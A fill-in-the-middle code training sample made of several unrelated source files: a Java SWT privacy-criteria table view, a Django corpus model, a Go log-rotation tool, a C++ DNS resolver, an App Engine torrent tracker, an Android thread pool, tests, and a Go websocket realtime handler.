import org.eclipse.swt.widgets.Composite;
import org.eclipse.swt.widgets.TableItem;
import de.linearbits.swt.table.DynamicTable;
import de.linearbits.swt.table.DynamicTableColumn;
/**
* This class displays a list of all defined privacy criteria.
*
* @author fabian
*/
public class ViewPrivacyModels implements IView {
/** Controller */
private Controller controller;
/** Model */
private Model model = null;
/** View */
private final DynamicTable table;
/** View */
private final DynamicTableColumn column1;
/** View */
private final DynamicTableColumn column2;
/** View */
private final DynamicTableColumn column3;
/** View */
private final Composite root;
/** View */
private final Image symbolL;
/** View */
private final Image symbolT;
/** View */
private final Image symbolK;
/** View */
private final Image symbolD;
/** View */
private final Image symbolDP;
/** View */
private final Image symbolR;
/** View */
private final Image symbolG;
/** View */
private final Image symbolB;
/** View */
private final LayoutPrivacySettings layout;
/**
* Creates a new instance.
*
* @param parent
* @param controller
* @param layoutCriteria
*/
public ViewPrivacyModels(final Composite parent, final Controller controller, LayoutPrivacySettings layoutCriteria) {
// Register
this.controller = controller;
this.controller.addListener(ModelPart.CRITERION_DEFINITION, this);
this.controller.addListener(ModelPart.MODEL, this);
this.controller.addListener(ModelPart.ATTRIBUTE_TYPE, this);
<|fim▁hole|> this.layout = layoutCriteria;
this.symbolL = controller.getResources().getManagedImage("symbol_l.png"); //$NON-NLS-1$
this.symbolT = controller.getResources().getManagedImage("symbol_t.png"); //$NON-NLS-1$
this.symbolK = controller.getResources().getManagedImage("symbol_k.png"); //$NON-NLS-1$
this.symbolD = controller.getResources().getManagedImage("symbol_d.png"); //$NON-NLS-1$
this.symbolDP = controller.getResources().getManagedImage("symbol_dp.png"); //$NON-NLS-1$
this.symbolR = controller.getResources().getManagedImage("symbol_r.png"); //$NON-NLS-1$
this.symbolG = controller.getResources().getManagedImage("symbol_gt.png"); //$NON-NLS-1$
this.symbolB = controller.getResources().getManagedImage("symbol_b.png"); //$NON-NLS-1$
this.root = parent;
this.table = SWTUtil.createTableDynamic(root, SWT.SINGLE | SWT.V_SCROLL | SWT.FULL_SELECTION);
this.table.setHeaderVisible(true);
this.table.setLinesVisible(true);
GridData gd = SWTUtil.createFillHorizontallyGridData();
gd.heightHint = 100;
this.table.setLayoutData(gd);
SWTUtil.createGenericTooltip(table);
this.table.setMenu(new ClipboardHandlerTable(table).getMenu());
this.table.addSelectionListener(new SelectionAdapter(){
public void widgetSelected(SelectionEvent arg0) {
layout.updateButtons();
}
});
this.column1 = new DynamicTableColumn(table, SWT.NONE);
this.column1.setText(Resources.getMessage("ViewCriteriaList.0")); //$NON-NLS-1$
this.column1.setWidth("10%", "30px"); //$NON-NLS-1$ //$NON-NLS-2$
this.column2 = new DynamicTableColumn(table, SWT.NONE);
this.column2.setText(Resources.getMessage("CriterionSelectionDialog.2")); //$NON-NLS-1$
this.column2.setWidth("45%", "100px"); //$NON-NLS-1$ //$NON-NLS-2$
this.column3 = new DynamicTableColumn(table, SWT.NONE);
this.column3.setText(Resources.getMessage("CriterionSelectionDialog.3")); //$NON-NLS-1$
this.column3.setWidth("45%", "100px"); //$NON-NLS-1$ //$NON-NLS-2$
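        // setWidth(percentage, minimum) -- by assumption about the DynamicTable
        // API, columns scale with the table but never shrink below the pixel minimum.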
this.column1.pack();
this.column2.pack();
this.column3.pack();
this.layout.updateButtons();
reset();
}
/**
* Add
*/
public void actionAdd() {
controller.actionCriterionAdd();
}
/**
* Configure
*/
public void actionConfigure() {
ModelCriterion criterion = this.getSelectedCriterion();
if (criterion != null) {
controller.actionCriterionConfigure(criterion);
}
}
/**
* Pull
*/
public void actionPull() {
ModelCriterion criterion = this.getSelectedCriterion();
if (criterion != null && criterion instanceof ModelExplicitCriterion) {
controller.actionCriterionPull(criterion);
}
}
/**
* Push
*/
public void actionPush() {
ModelCriterion criterion = this.getSelectedCriterion();
if (criterion != null && criterion instanceof ModelExplicitCriterion) {
controller.actionCriterionPush(criterion);
}
}
/**
* Remove
*/
public void actionRemove() {
ModelCriterion criterion = this.getSelectedCriterion();
if (criterion != null) {
controller.actionCriterionEnable(criterion);
}
}
@Override
public void dispose() {
this.controller.removeListener(this);
}
/**
* Returns the currently selected criterion, if any
* @return
*/
public ModelCriterion getSelectedCriterion() {
if (table.getSelection() == null || table.getSelection().length == 0) {
return null;
}
return (ModelCriterion)table.getSelection()[0].getData();
}
/**
* May criteria be added
* @return
*/
public boolean isAddEnabled() {
return model != null && model.getInputDefinition() != null &&
model.getInputDefinition().getQuasiIdentifyingAttributes() != null;
}
@Override
public void reset() {
root.setRedraw(false);
if (table != null) {
table.removeAll();
}
root.setRedraw(true);
SWTUtil.disable(root);
}
@Override
public void update(ModelEvent event) {
// Model update
if (event.part == ModelPart.MODEL) {
this.model = (Model)event.data;
}
// Other updates
if (event.part == ModelPart.CRITERION_DEFINITION ||
event.part == ModelPart.ATTRIBUTE_TYPE ||
event.part == ModelPart.ATTRIBUTE_TYPE_BULK_UPDATE ||
event.part == ModelPart.MODEL) {
// Update table
if (model!=null) {
updateTable();
}
}
}
/**
* Update table
*/
private void updateTable() {
root.setRedraw(false);
table.removeAll();
if (model.getDifferentialPrivacyModel().isEnabled()) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", model.getDifferentialPrivacyModel().toString(), "" }); //$NON-NLS-1$ //$NON-NLS-2$
item.setImage(0, symbolDP);
item.setData(model.getDifferentialPrivacyModel());
}
if (model.getKAnonymityModel().isEnabled()) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", model.getKAnonymityModel().toString(), "" }); //$NON-NLS-1$ //$NON-NLS-2$
item.setImage(0, symbolK);
item.setData(model.getKAnonymityModel());
}
if (model.getKMapModel().isEnabled()) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", model.getKMapModel().toString(), "" }); //$NON-NLS-1$ //$NON-NLS-2$
item.setImage(0, symbolK);
item.setData(model.getKMapModel());
}
if (model.getDPresenceModel().isEnabled()) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", model.getDPresenceModel().toString(), "" }); //$NON-NLS-1$ //$NON-NLS-2$
item.setImage(0, symbolD);
item.setData(model.getDPresenceModel());
}
if (model.getStackelbergModel().isEnabled()) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", model.getStackelbergModel().toString(), ""});
item.setImage(0, symbolG);
item.setData(model.getStackelbergModel());
}
List<ModelExplicitCriterion> explicit = new ArrayList<ModelExplicitCriterion>();
for (ModelLDiversityCriterion other : model.getLDiversityModel().values()) {
if (other.isEnabled()) {
explicit.add(other);
}
}
for (ModelTClosenessCriterion other : model.getTClosenessModel().values()) {
if (other.isEnabled()) {
explicit.add(other);
}
}
for (ModelDDisclosurePrivacyCriterion other : model.getDDisclosurePrivacyModel().values()) {
if (other.isEnabled()) {
explicit.add(other);
}
}
for (ModelBLikenessCriterion other : model.getBLikenessModel().values()) {
if (other.isEnabled()) {
explicit.add(other);
}
}
Collections.sort(explicit, new Comparator<ModelExplicitCriterion>(){
public int compare(ModelExplicitCriterion o1, ModelExplicitCriterion o2) {
return o1.getAttribute().compareTo(o2.getAttribute());
}
});
for (ModelExplicitCriterion c :explicit) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", c.toString(), c.getAttribute() }); //$NON-NLS-1$
if (c instanceof ModelLDiversityCriterion) {
item.setImage(0, symbolL);
} else if (c instanceof ModelTClosenessCriterion) {
item.setImage(0, symbolT);
} else if (c instanceof ModelDDisclosurePrivacyCriterion) {
item.setImage(0, symbolD);
} else if (c instanceof ModelBLikenessCriterion) {
item.setImage(0, symbolB);
}
item.setData(c);
}
List<ModelRiskBasedCriterion> riskBased = new ArrayList<ModelRiskBasedCriterion>();
for (ModelRiskBasedCriterion other : model.getRiskBasedModel()) {
if (other.isEnabled()) {
riskBased.add(other);
}
}
Collections.sort(riskBased, new Comparator<ModelRiskBasedCriterion>(){
public int compare(ModelRiskBasedCriterion o1, ModelRiskBasedCriterion o2) {
return o1.getLabel().compareTo(o2.getLabel());
}
});
for (ModelRiskBasedCriterion c : riskBased) {
TableItem item = new TableItem(table, SWT.NONE);
item.setText(new String[] { "", c.toString(), "" }); //$NON-NLS-1$ //$NON-NLS-2$
item.setImage(0, symbolR);
item.setData(c);
}
// Update
layout.updateButtons();
root.setRedraw(true);
SWTUtil.enable(root);
table.redraw();
}
}<|fim▁end|> | this.controller.addListener(ModelPart.ATTRIBUTE_TYPE_BULK_UPDATE, this);
|
<|file_name|>corpus.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright (C) 2010 Samalyse SARL
# Copyright (C) 2010-2014 Parisson SARL
# This file is part of Telemeta.
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors: Olivier Guilyardi <[email protected]>
# David LIPSZYC <[email protected]>
# Guillaume Pellerin <[email protected]>
from __future__ import division
from django.utils.translation import ugettext_lazy as _
from telemeta.models.core import *
from telemeta.models.resource import *
from telemeta.models.collection import *
class MediaCorpus(MediaBaseResource):
"Describe a corpus"
element_type = 'corpus'
children_type = 'collections'
children = models.ManyToManyField(MediaCollection, related_name="corpus",
verbose_name=_('collections'), blank=True)
recorded_from_year = IntegerField(_('recording year (from)'), help_text=_('YYYY'))
recorded_to_year = IntegerField(_('recording year (until)'), help_text=_('YYYY'))
objects = MediaCorpusManager()
permissions = (("can_download_corpus_epub", "Can download corpus EPUB"),)
@property
def public_id(self):
return self.code
@property
def has_mediafile(self):
for child in self.children.all():
if child.has_mediafile:
return True
return False
def computed_duration(self):
duration = Duration()
for child in self.children.all():
duration += child.computed_duration()
return duration
computed_duration.verbose_name = _('total available duration')
class Meta(MetaCore):
db_table = 'media_corpus'
verbose_name = _('corpus')
verbose_name_plural = _('corpus')
ordering = ['code']
class MediaCorpusRelated(MediaRelated):
"Corpus related media"
resource = ForeignKey(MediaCorpus, related_name="related", verbose_name=_('corpus'))
class Meta(MetaCore):
db_table = 'media_corpus_related'
verbose_name = _('corpus related media')<|fim▁hole|><|fim▁end|> | verbose_name_plural = _('corpus related media') |
<|file_name|>glogrotate.go<|end_file_name|><|fim▁begin|>/*
Gzips and deletes log files generated by glog http://github.com/golang/glog
Basic usage:
glogrotate -base=/var/log -maxage=240h myapp myotherapp
glogrotate will not touch the current log files. There are different timeouts for the INFO, WARNING, and ERROR log levels.
*/
package main
import (
"flag"
"fmt"
"os"
"os/exec"
"path/filepath"
"strings"
"time"
)
const (
defaultDeleteInfoAfter = 30 * 24 * time.Hour
defaultWarnMult = 2
defaultErrorMult = 3
)
var (
base = flag.String("base", "/var/log/", "log subdir")
deleteInfoAfter = flag.Duration("maxage", defaultDeleteInfoAfter, "delete INFO files older than this")
warnMult = flag.Int("warn", defaultWarnMult, "multiplier relative to maxage for WARNING files")
errorMult = flag.Int("error", defaultErrorMult, "multiplier relative to maxage for ERROR/FATAL files")
verbose = flag.Bool("v", false, "verbose")
)
func main() {
flag.Parse()
for _, log := range flag.Args() {
clean(*base+"/"+log, log)
}
}
func clean(dir, name string) {
if *verbose {
fmt.Printf("clean %s/%s*...\n", dir, name)
}
fs, err := filepath.Glob(dir + "/" + name + "*")
if err != nil {
fatalf("file error: %s", err)
}
doNotTouch := map[string]struct{}{}
var candidates []string
for _, f := range fs {
if t, err := os.Readlink(f); err == nil {
// it's a symlink to the current file.
a := filepath.Join(filepath.Dir(f), t)
doNotTouch[a] = struct{}{}
continue
}
candidates = append(candidates, f)
}
for _, f := range candidates {
if _, ok := doNotTouch[f]; ok {
if *verbose {
fmt.Printf("don't touch: %s\n", f)
}
continue
}
// we want the date from 'one.rz-reqmngt1-eu.root.log.ERROR.20150320-103857.29198'
// (might have a .gz suffix)
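		// For the name above (after stripping a trailing "gz" element),
		// fields[len(fields)-3] is the level ("ERROR") and
		// fields[len(fields)-2] holds the date-time ("20150320-103857").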
fields := strings.Split(f, ".")
if len(fields) < 3 {
fatalf("unexpected filename: %q", f)
}
if fields[len(fields)-1] == `gz` {
fields = fields[:len(fields)-1]
}
var dAfter time.Duration
level := fields[len(fields)-3]
switch level {
case "INFO":
dAfter = *deleteInfoAfter
case "WARNING":
dAfter = time.Duration(*warnMult) * (*deleteInfoAfter)
case "ERROR", "FATAL":
dAfter = time.Duration(*errorMult) * (*deleteInfoAfter)
default:
fatalf("weird log level: %q", level)
}
d, err := time.Parse("20060102", strings.SplitN(fields[len(fields)-2], "-", 2)[0])
if err != nil {
fatalf("invalid date: %s", err)
}
if d.Before(time.Now().Add(-dAfter)) {
if *verbose {
fmt.Printf("delete %s\n", f)
}
os.Remove(f)
continue
}
if !strings.HasSuffix(f, ".gz") {
if *verbose {<|fim▁hole|> }
}
}
}
func fatalf(f string, args ...interface{}) {
	fmt.Fprintf(os.Stderr, f, args...)
fmt.Fprint(os.Stderr, "\n")
os.Exit(1)
}<|fim▁end|> | fmt.Printf("gzipping %s...\n", f)
}
if err := exec.Command("gzip", f).Run(); err != nil {
fatalf("gzip: %s", err) |
<|file_name|>dns.cc<|end_file_name|><|fim▁begin|>/**
* $Id$
* Copyright (C) 2008 - 2014 Nils Asmussen
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
#include <esc/proto/socket.h>
#include <esc/stream/fstream.h>
#include <esc/stream/istringstream.h>
#include <esc/stream/ostream.h>
#include <esc/dns.h>
#include <sys/common.h>
#include <sys/endian.h>
#include <sys/proc.h>
#include <sys/thread.h>
#include <signal.h>
namespace esc {
/* based on http://tools.ietf.org/html/rfc1035 */
#define DNS_RECURSION_DESIRED 0x100
#define DNS_PORT 53
#define BUF_SIZE 512
uint16_t DNS::_nextId = 0;
esc::Net::IPv4Addr DNS::_nameserver;
enum Type {
TYPE_A = 1, /* a host address */
TYPE_NS = 2, /* an authoritative name server */
TYPE_CNAME = 5, /* the canonical name for an alias */
TYPE_HINFO = 13, /* host information */
TYPE_MX = 15, /* mail exchange */
};
enum Class {
CLASS_IN = 1 /* the Internet */
};
struct DNSHeader {
uint16_t id;
uint16_t flags;
uint16_t qdCount;
uint16_t anCount;
uint16_t nsCount;
uint16_t arCount;
} A_PACKED;
struct DNSQuestionEnd {
uint16_t type;
uint16_t cls;
} A_PACKED;
struct DNSAnswer {
uint16_t name;
uint16_t type;
uint16_t cls;
uint32_t ttl;
uint16_t length;
} A_PACKED;
esc::Net::IPv4Addr DNS::getHost(const char *name,uint timeout) {
if(isIPAddress(name)) {
esc::Net::IPv4Addr addr;
IStringStream is(name);
is >> addr;
return addr;
}
return resolve(name,timeout);
}
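/* Heuristic shape check for dotted-quad notation, e.g. " 192.168.0.1 ":
 * it only verifies 3 dots with 1-3 digits per part (ignoring surrounding
 * whitespace), without validating that each part is <= 255. */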
bool DNS::isIPAddress(const char *name) {
int dots = 0;
int len = 0;
// ignore whitespace at the beginning
while(isspace(*name))
name++;
while(dots < 4 && len < 4 && *name) {
if(*name == '.') {
dots++;
len = 0;
}
else if(isdigit(*name))
len++;
else
break;
name++;
}
// ignore whitespace at the end
while(isspace(*name))
name++;
return dots == 3 && len > 0 && len < 4;
}
esc::Net::IPv4Addr DNS::resolve(const char *name,uint timeout) {
uint8_t buffer[BUF_SIZE];
if(_nameserver.value() == 0) {
FStream in(getResolveFile(),"r");
in >> _nameserver;
if(_nameserver.value() == 0)
VTHROWE("No nameserver",-EHOSTNOTFOUND);
}
size_t nameLen = strlen(name);
size_t total = sizeof(DNSHeader) + nameLen + 2 + sizeof(DNSQuestionEnd);<|fim▁hole|> if(total > sizeof(buffer))
VTHROWE("Hostname too long",-EINVAL);
	// generate a unique transaction id for this request
uint16_t txid = (getpid() << 16) | _nextId;
// build DNS request message
DNSHeader *h = reinterpret_cast<DNSHeader*>(buffer);
h->id = cputobe16(txid);
h->flags = cputobe16(DNS_RECURSION_DESIRED);
h->qdCount = cputobe16(1);
h->anCount = 0;
h->nsCount = 0;
h->arCount = 0;
convertHostname(reinterpret_cast<char*>(h + 1),name,nameLen);
DNSQuestionEnd *qend = reinterpret_cast<DNSQuestionEnd*>(buffer + sizeof(*h) + nameLen + 2);
qend->type = cputobe16(TYPE_A);
qend->cls = cputobe16(CLASS_IN);
// create socket
esc::Socket sock(esc::Socket::SOCK_DGRAM,esc::Socket::PROTO_UDP);
// send over socket
esc::Socket::Addr addr;
addr.family = esc::Socket::AF_INET;
addr.d.ipv4.addr = _nameserver.value();
addr.d.ipv4.port = DNS_PORT;
sock.sendto(addr,buffer,total);
sighandler_t oldhandler;
if((oldhandler = signal(SIGALRM,sigalarm)) == SIG_ERR)
VTHROW("Unable to set SIGALRM handler");
int res;
if((res = ualarm(timeout * 1000)) < 0)
VTHROWE("ualarm(" << (timeout * 1000) << ")",res);
try {
// receive response
sock.recvfrom(addr,buffer,sizeof(buffer));
}
catch(const esc::default_error &e) {
if(e.error() == -EINTR)
VTHROWE("Received no response from DNS server " << _nameserver,-ETIMEOUT);
// ignore errors here
if(signal(SIGALRM,oldhandler) == SIG_ERR) {}
throw;
}
// ignore errors here
if(signal(SIGALRM,oldhandler) == SIG_ERR) {}
if(be16tocpu(h->id) != txid)
VTHROWE("Received DNS response with wrong transaction id",-EHOSTNOTFOUND);
int questions = be16tocpu(h->qdCount);
int answers = be16tocpu(h->anCount);
// skip questions
uint8_t *data = reinterpret_cast<uint8_t*>(h + 1);
for(int i = 0; i < questions; ++i) {
size_t len = questionLength(data);
data += len + sizeof(DNSQuestionEnd);
}
// parse answers
for(int i = 0; i < answers; ++i) {
DNSAnswer *ans = reinterpret_cast<DNSAnswer*>(data);
if(be16tocpu(ans->type) == TYPE_A && be16tocpu(ans->length) == esc::Net::IPv4Addr::LEN)
return esc::Net::IPv4Addr(data + sizeof(DNSAnswer));
}
VTHROWE("Unable to find IP address in DNS response",-EHOSTNOTFOUND);
}
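/* Converts a hostname into the DNS wire format of length-prefixed labels,
 * e.g. "www.example.org" becomes "\x03www\x07example\x03org\x00". */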
void DNS::convertHostname(char *dst,const char *src,size_t len) {
// leave one byte space for the length of the first part
const char *from = src + len++;
char *to = dst + len;
// we start with the \0 at the end
int partLen = -1;
for(size_t i = 0; i < len; i++, to--, from--) {
if(*from == '.') {
*to = partLen;
partLen = 0;
}
else {
*to = *from;
partLen++;
}
}
*to = partLen;
}
size_t DNS::questionLength(const uint8_t *data) {
size_t total = 0;
while(*data != 0) {
uint8_t len = *data;
// skip this name-part
total += len + 1;
data += len + 1;
}
// skip zero ending, too
return total + 1;
}
}<|fim▁end|> | |
<|file_name|>main.py<|end_file_name|><|fim▁begin|>import logging
from src.settings import JINJA_ENVIRONMENT
from src.base import BaseHandler
from src.main.models import Torrent, UserTorrent
from google.appengine.ext import ndb
from google.appengine.api import users
import arrow
from time import sleep
class IndexPage(BaseHandler):
def get(self):
# new movies
self.template_values['movies'] = Torrent.query(Torrent.category_code == 207, Torrent.uploader == 'YIFY', Torrent.resolution == 720).order(-Torrent.uploaded_at).fetch(30)
# new series
self.template_values['series_new'] = Torrent.query(Torrent.category_code == 205, Torrent.series_episode == 1).order(-Torrent.uploaded_at).fetch(15)
episodes_new = []
series_watching = []
# watching series
uts = UserTorrent.query(UserTorrent.user == users.get_current_user(), UserTorrent.category_code == 205).fetch()
if uts:
series_watching = set()
for ut in [ut for ut in uts if ut.torrent.get().series_title]:
series_watching.add(ut.torrent.get().series_title)
logging.info('{0} series being watched by user'.format(len(uts)))
<|fim▁hole|> episodes_new = Torrent.query(Torrent.series_title.IN(series_watching), Torrent.uploaded_at > cutoff, Torrent.category_code == 205).order(-Torrent.uploaded_at).fetch()
logging.info('{0} episodes fetched for watched series'.format(len(episodes_new)))
self.template_values['series_watching'] = series_watching
self.template_values['episodes_new'] = episodes_new
# logging.info('{0}'.format(self.template_values))
template = JINJA_ENVIRONMENT.get_template('main/templates/index.html')
self.response.write(template.render(self.template_values))
class CategoryPage(BaseHandler):
def get(self, cat):
logging.info('cat {0}'.format(cat))
self.template_values['cat'] = int(cat)
# get torrents
torrents = Torrent.query(Torrent.category_code == int(cat)).order(-Torrent.uploaded_at).fetch()
self.template_values['torrents'] = torrents
logging.info('torrents {0}'.format(len(torrents)))
template = JINJA_ENVIRONMENT.get_template('main/templates/category.html')
self.response.write(template.render(self.template_values))
class DownloadPage(BaseHandler):
def get(self, key):
logging.info('download {0}'.format(key))
logging.info('user {0}'.format(self.user))
torrent = ndb.Key(urlsafe=key).get()
logging.info('torrent {0}'.format(torrent))
ut = UserTorrent.query(UserTorrent.user == self.user, UserTorrent.torrent == torrent.key).get()
if not ut:
ut = UserTorrent(user=self.user, torrent=torrent.key, category_code=torrent.category_code)
ut.put()
logging.info('User Torrent saved')
else:
ut.key.delete()
logging.info('User Torrent deleted')
logging.info('User Torrent {0}'.format(ut))
self.response.status = '200 OK'<|fim▁end|> | # new episodes
if series_watching:
cutoff = arrow.utcnow().replace(days=-14).datetime |
<|file_name|>PicassoExecutorService.java<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 2013 Square, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.hyh.common.picasso;
import android.net.ConnectivityManager;
import android.net.NetworkInfo;
import android.telephony.TelephonyManager;
import java.util.concurrent.Future;
import java.util.concurrent.FutureTask;
import java.util.concurrent.PriorityBlockingQueue;
import java.util.concurrent.ThreadPoolExecutor;
import java.util.concurrent.TimeUnit;
/**
* The default {@link java.util.concurrent.ExecutorService} used for new {@link NativePicasso} instances.
* <p>
* Exists as a custom type so that we can differentiate the use of defaults versus a user-supplied
* instance.
*/
class PicassoExecutorService extends ThreadPoolExecutor {
private static final int DEFAULT_THREAD_COUNT = 3;
PicassoExecutorService() {
super(DEFAULT_THREAD_COUNT, DEFAULT_THREAD_COUNT, 0, TimeUnit.MILLISECONDS,
new PriorityBlockingQueue<Runnable>(), new Utils.PicassoThreadFactory());
}
void adjustThreadCount(NetworkInfo info) {
if (info == null || !info.isConnectedOrConnecting()) {
setThreadCount(DEFAULT_THREAD_COUNT);
return;
}
switch (info.getType()) {
case ConnectivityManager.TYPE_WIFI:
case ConnectivityManager.TYPE_WIMAX:
case ConnectivityManager.TYPE_ETHERNET:
setThreadCount(4);
break;
case ConnectivityManager.TYPE_MOBILE:
switch (info.getSubtype()) {
case TelephonyManager.NETWORK_TYPE_LTE: // 4G
case TelephonyManager.NETWORK_TYPE_HSPAP:
case TelephonyManager.NETWORK_TYPE_EHRPD:
setThreadCount(3);
break;
case TelephonyManager.NETWORK_TYPE_UMTS: // 3G
case TelephonyManager.NETWORK_TYPE_CDMA:
case TelephonyManager.NETWORK_TYPE_EVDO_0:
case TelephonyManager.NETWORK_TYPE_EVDO_A:
case TelephonyManager.NETWORK_TYPE_EVDO_B:
setThreadCount(2);
break;
case TelephonyManager.NETWORK_TYPE_GPRS: // 2G
case TelephonyManager.NETWORK_TYPE_EDGE:
setThreadCount(1);
break;
default:
setThreadCount(DEFAULT_THREAD_COUNT);
}
break;
default:
setThreadCount(DEFAULT_THREAD_COUNT);
}
}
private void setThreadCount(int threadCount) {
setCorePoolSize(threadCount);
setMaximumPoolSize(threadCount);
}
@Override
public Future<?> submit(Runnable task) {
PicassoFutureTask ftask = new PicassoFutureTask((BitmapHunter) task);
execute(ftask);
return ftask;
}
private static final class PicassoFutureTask extends FutureTask<BitmapHunter>
implements Comparable<PicassoFutureTask> {
private final BitmapHunter hunter;
public PicassoFutureTask(BitmapHunter hunter) {
super(hunter, null);
this.hunter = hunter;
}
@Override
public int compareTo(PicassoFutureTask other) {
NativePicasso.Priority p1 = hunter.getPriority();
NativePicasso.Priority p2 = other.hunter.getPriority();
// High-priority requests are "lesser" so they are sorted to the front.
// Equal priorities are sorted by sequence number to provide FIFO ordering.
return (p1 == p2 ? hunter.sequence - other.hunter.sequence : p2.ordinal() - p1.ordinal());<|fim▁hole|> }
}
}<|fim▁end|> | |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# © 2014 Elico Corp (https://www.elico-corp.com)<|fim▁hole|>from . import stock
from . import wizard
from . import product_price_history
from . import account_anglo_saxon_pos
from . import purchase<|fim▁end|> | # Licence AGPL-3.0 or later(http://www.gnu.org/licenses/agpl.html)
from . import product |
<|file_name|>bridge_name_generator_test.go<|end_file_name|><|fim▁begin|>package bridgemgr_test
import (
"code.cloudfoundry.org/garden-linux/network/bridgemgr"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
)
var _ = Describe("Bridge Name Generator", func() {
var (
generator bridgemgr.BridgeNameGenerator
)
BeforeEach(func() {
generator = bridgemgr.NewBridgeNameGenerator("pr-")
})
It("returns unique names each time it is called", func() {
generatedNames := make(map[string]bool)
for i := 0; i < 100; i++ {
name := generator.Generate()
generatedNames[name] = true
}
Expect(generatedNames).To(HaveLen(100))
})
<|fim▁hole|> name := generator.Generate()
Expect(name).To(HavePrefix("pr-"))
})
It("returns names that are exactly 15 characters", func() {
name := generator.Generate()
Expect(name).To(HaveLen(15))
name = bridgemgr.NewBridgeNameGenerator("p").Generate()
Expect(name).To(HaveLen(15))
})
})<|fim▁end|> | It("includes the entire prefix as part of the name", func() { |
<|file_name|>main.js<|end_file_name|><|fim▁begin|>'use strict';
describe('Controller: MainCtrl', function () {
// load the controller's module
beforeEach(module('pillzApp'));
var MainCtrl,
scope,<|fim▁hole|>
// Initialize the controller and a mock scope
beforeEach(inject(function (_$httpBackend_, $controller, $rootScope) {
$httpBackend = _$httpBackend_;
$httpBackend.expectGET('/api/awesomeThings')
.respond(['HTML5 Boilerplate', 'AngularJS', 'Karma', 'Express']);
scope = $rootScope.$new();
MainCtrl = $controller('MainCtrl', {
$scope: scope
});
}));
it('should attach a list of awesomeThings to the scope', function () {
expect(scope.awesomeThings).toBeUndefined();
$httpBackend.flush();
expect(scope.awesomeThings.length).toBe(4);
});
});<|fim▁end|> | $httpBackend; |
<|file_name|>realtime.go<|end_file_name|><|fim▁begin|>package realtime
import (
"context"
"fmt"
"net/http"
"strings"
"time"
"github.com/cozy/cozy-stack/model/instance"
"github.com/cozy/cozy-stack/model/permission"
"github.com/cozy/cozy-stack/model/vfs"
"github.com/cozy/cozy-stack/pkg/consts"
"github.com/cozy/cozy-stack/pkg/couchdb"
"github.com/cozy/cozy-stack/pkg/jsonapi"
"github.com/cozy/cozy-stack/pkg/logger"
"github.com/cozy/cozy-stack/pkg/prefixer"
"github.com/cozy/cozy-stack/pkg/realtime"
"github.com/cozy/cozy-stack/web/middlewares"
"github.com/gorilla/websocket"
"github.com/labstack/echo/v4"
)
const (
// Time allowed to write a message to the peer
writeWait = 10 * time.Second
// Time allowed to read the next pong message from the peer
pongWait = 60 * time.Second
// Send pings to peer with this period (must be less than pongWait)
pingPeriod = (pongWait * 9) / 10
// Maximum message size allowed from peer
maxMessageSize = 1024
)
var upgrader = websocket.Upgrader{
	// Don't check the origin of the connection; we check authorization later
CheckOrigin: func(r *http.Request) bool { return true },
Subprotocols: []string{"io.cozy.websocket"},
ReadBufferSize: 1024,
WriteBufferSize: 1024,
}
type command struct {
Method string `json:"method"`
Payload struct {
Type string `json:"type"`
ID string `json:"id"`
} `json:"payload"`
}
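// An illustrative client message (shape assumed from the fields above):
//   {"method": "SUBSCRIBE", "payload": {"type": "io.cozy.files", "id": ""}}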
type wsResponsePayload struct {
Type string `json:"type"`
ID string `json:"id"`
Doc interface{} `json:"doc,omitempty"`
}
type wsResponse struct {
Event string `json:"event"`
Payload wsResponsePayload `json:"payload"`
}
type wsErrorPayload struct {
Status string `json:"status"`
Code string `json:"code"`
Title string `json:"title"`
Source interface{} `json:"source"`
}
type wsError struct {
Event string `json:"event"`
Payload wsErrorPayload `json:"payload"`
}
func unauthorized(cmd interface{}) *wsError {
return &wsError{
Event: "error",
Payload: wsErrorPayload{
Status: "401 Unauthorized",
Code: "unauthorized",
Title: "The authentication has failed",
Source: cmd,
},
}
}
func forbidden(cmd *command) *wsError {
return &wsError{
Event: "error",
Payload: wsErrorPayload{
Status: "403 Forbidden",
Code: "forbidden",
Title: fmt.Sprintf("The application can't subscribe to %s", cmd.Payload.Type),
Source: cmd,
},
}
}
func unknownMethod(method string, cmd interface{}) *wsError {
return &wsError{
Event: "error",
Payload: wsErrorPayload{
Status: "405 Method Not Allowed",
Code: "method not allowed",
Title: fmt.Sprintf("The %s method is not supported", method),
Source: cmd,
},
}
}
func missingType(cmd *command) *wsError {
return &wsError{
Event: "error",
Payload: wsErrorPayload{
Status: "404 Page Not Found",
Code: "page not found",
Title: "The type parameter is mandatory for SUBSCRIBE",
Source: cmd,
},
}
}
func sendErr(ctx context.Context, errc chan *wsError, e *wsError) {
select {
case errc <- e:
case <-ctx.Done():
}
}
